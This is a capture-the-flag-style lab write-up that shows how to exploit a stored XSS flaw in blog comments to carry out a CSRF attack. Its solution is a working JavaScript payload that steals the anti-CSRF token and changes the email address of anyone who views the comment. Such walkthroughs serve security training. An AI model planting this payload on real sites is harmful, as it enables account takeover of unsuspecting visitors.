13.31 Lab: Exploiting XSS to perform CSRF
This lab contains a stored XSS vulnerability in the blog comments function. To solve the lab, exploit the vulnerability to perform a CSRF attack and change the email address of someone who views the blog post comments. You can log in to your own account using the following credentials: wiener:peter | Karthikeyan Nagaraj
2 min readJun 25, 2024
Description
This lab contains a stored XSS vulnerability in the blog comments function. To solve the lab, exploit the vulnerability to perform a CSRF attack and change the email address of someone who views the blog post comments.
You can log in to your own account using the following credentials: wiener:peter
Solution
- Log in using the credentials provided. On your user account page, notice the function for updating your email address.
- If you view the source for the page, you’ll see the following information:
* You need to issue a POST request to/my-account/change-email
, with a parameter calledemail
.
* There’s an anti-CSRF token in a hidden input calledtoken
. - This means your exploit will need to load the user account page, extract the CSRF token, and then use the token to change the victim’s email address.
- Submit the following payload in a blog comment:
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/my-account',true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/my-account/change-email', true);
changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>
This will make anyone who views the comment issue a POST request to change their email address to test@test.com
.
A YouTube Channel for Cybersecurity Lab’s Poc and Write-ups
Telegram Channel for Free Ethical Hacking Dumps
Thank you for Reading!
Happy Ethical Hacking ~
Author: Karthikeyan Nagaraj ~ Cyberw1ng